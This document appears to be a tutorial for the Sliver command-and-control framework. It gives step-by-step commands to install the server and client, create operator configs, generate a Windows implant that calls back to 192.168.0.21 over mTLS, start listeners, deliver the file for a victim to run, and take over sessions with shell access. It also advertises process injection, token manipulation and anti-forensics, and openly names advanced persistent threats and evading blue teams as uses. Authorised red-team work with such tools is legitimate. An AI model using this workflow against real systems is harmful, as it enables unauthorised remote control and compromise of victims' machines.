Sliver is a Command and Control (C2) system made for penetration testers, red teams, and advanced persistent threats. It generates implants (slivers) that can run on virtually every architecture out there, and securely manages these connections through a central server. Sliver supports multiple callback protocols including DNS, TCP, and HTTP(S) to make egress simple, even when those pesky blue teams block your domains. You can even have multiple operators (players) simultaneously commanding your sliver army.

SLIVER

Documentation

Wiki: https://github.com/BishopFox/sliver/wiki/Getting-Started

GitHub: https://github.com/BishopFox/sliver/wiki

Features

  • Dynamic code generation
  • Compile-time obfuscation
  • Multiplayer-mode
  • Procedurally generated C2 over HTTP(S)
  • DNS canary blue team detection
  • Secure C2 over mTLS, HTTP(S), and DNS
  • Fully scriptable
  • Local and remote process injection
  • Windows process migration
  • Windows user token manipulation
  • Anti-anti-anti-forensics
  • Let's Encrypt integration
  • In-memory .NET assembly execution

Installation

Server

1. Download the server application

  • wget https://github.com/BishopFox/sliver/releases/download/v1.0.6-beta/sliver-server_linux.zip

2. Unzip the file

  • unzip sliver-server_linux.zip

3. Install required libraries

  • sudo apt-get install mingw-w64 binutils-mingw-w64 g++-mingw-w64

4. Run the application

  • sudo ./sliver-server

5. Now we need to create a player so that an operator can connect, and then display the player database

  • new-player --operator vk9ops --lhost 192.168.0.21
  • players

6. The .cfg file that was created will need to be installed on the client's host, so save it for later

  • [*] Saved new client config to: /home/vry4n/Desktop/vk9ops_192.168.0.21.cfg

7. Start Multiplayer mode

  • multiplayer

Client

1. Download the client application

  • wget https://github.com/BishopFox/sliver/releases/download/v1.0.6-beta/sliver-client_linux.zip

2. Unzip the application

  • unzip sliver-client_linux.zip

3. Install the required libraries

  • sudo apt-get install mingw-w64 binutils-mingw-w64 g++-mingw-w64

4. Try to run the application

  • sudo ./sliver-client

5. Copy the vk9ops_192.168.0.21.cfg file from the server machine to the local machine, into /home/kali/.sliver-client/configs

  • sudo cp vk9ops_192.168.0.21.cfg /root/.sliver-client/configs

6. Try to run the application again

  • sudo ./sliver-client

If you ever get a communication error, the source of the issue might be that “multiplayer” has not been enabled on the Sliver server console.

How to use Sliver

1. See the help menu

  • help

2. Display players’ database

  • players

3. Create new player accounts; this can only be run from the Sliver server, not the client

  • new-player --operator <username> --lhost <DNS or IP of the server>

4. Display Sliver version

  • version

5. Generate an implant (mtls, http, dns); this creates a file that is saved at the location specified

generate: Generate a sliver binary

MTLS

  • generate --mtls 192.168.0.21 --save ./file.exe --os Windows

6. Now, we need to start the listener

http: Start an HTTP listener
https: Start an HTTPS listener
dns: Start a DNS listener
mtls: Start an mTLS listener

  • mtls
  • jobs

7. Deliver the file and wait for it to be executed by the user. Once it is executed, you will see a message on screen

8. Show all active sessions

  • sessions -h
  • sessions

9. Kill a session

  • session -k 1

10. Interact with a session

  • sessions
  • session -i 7

11. Run help to see all the available commands

  • help

12. Run some commands to test what you can do

  • whoami
  • info
  • shell

 
